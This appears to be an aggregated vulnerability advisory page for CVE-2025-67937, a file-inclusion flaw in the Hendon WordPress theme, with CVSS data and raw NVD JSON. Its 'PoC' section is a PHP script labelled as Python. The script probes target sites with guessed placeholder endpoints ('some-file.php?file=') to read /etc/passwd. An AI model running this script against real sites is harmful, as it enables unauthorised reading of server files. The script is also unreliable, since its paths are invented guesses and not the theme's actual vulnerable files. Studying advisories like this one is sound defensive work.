Security Vulnerability Report
中文
CVE-2025-67937 CVSS 8.1 HIGH

CVE-2025-67937

Published: 2026-01-08 10:15:53
Last Modified: 2026-02-03 19:16:15

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Mikado-Themes Hendon hendon allows PHP Local File Inclusion.This issue affects Hendon: from n/a through < 1.7.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:qodeinteractive:hendon:*:*:*:*:*:wordpress:*:* - VULNERABLE
Hendon < 1.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<?php /** * CVE-2025-67937 PoC - Mikado Themes Hendon Local File Inclusion * Target: WordPress Hendon Theme < 1.7 * Type: Local File Inclusion / Remote File Inclusion * * Usage: php poc.php <target_url> [file_path] * Example: php poc.php http://target.com /etc/passwd */ $targetUrl = $argv[1] ?? ''; $fileToInclude = $argv[2] ?? '/etc/passwd'; if (empty($targetUrl)) { echo "Usage: php poc.php <target_url> [file_path]\n"; echo "Example: php poc.php http://target.com /etc/passwd\n"; exit(1); } // Common vulnerable endpoints in WordPress themes $vulnerablePaths = [ '/wp-content/themes/hendon/some-file.php?file=' . $fileToInclude, '/wp-content/themes/hendon/template-parts/some-file.php?file=' . $fileToInclude, '/wp-content/themes/hendon/inc/partials/some-file.php?file=' . $fileToInclude, ]; echo "[*] CVE-2025-67937 PoC - Hendon Theme LFI/RFI\n"; echo "[*] Target: {$targetUrl}\n"; echo "[*] File to include: {$fileToInclude}\n\n"; foreach ($vulnerablePaths as $path) { $url = rtrim($targetUrl, '/') . $path; echo "[+] Testing: {$url}\n"; $context = stream_context_create([ 'http' => [ 'method' => 'GET', 'timeout' => 10, 'ignore_errors' => true ] ]); $response = @file_get_contents($url, false, $context); if ($response !== false && strlen($response) > 0) { echo "[!] Potential vulnerability confirmed!\n"; echo "[+] Response preview:\n"; echo substr($response, 0, 500) . "\n\n"; } } echo "[*] Testing completed.\n"; echo "[*] Note: Manual verification may be required as vulnerable paths vary.\n";

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67937", "sourceIdentifier": "[email protected]", "published": "2026-01-08T10:15:52.937", "lastModified": "2026-02-03T19:16:14.963", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Mikado-Themes Hendon hendon allows PHP Local File Inclusion.This issue affects Hendon: from n/a through < 1.7."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:qodeinteractive:hendon:*:*:*:*:*:wordpress:*:*", "versionEndExcluding": "1.7", "matchCriteriaId": "7D28CE55-0347-4104-9FA3-A1FCA81C9BD9"}]}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/hendon/vulnerability/wordpress-hendon-theme-1-7-local-file-inclusion-vulnerability?_s_id=cve", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}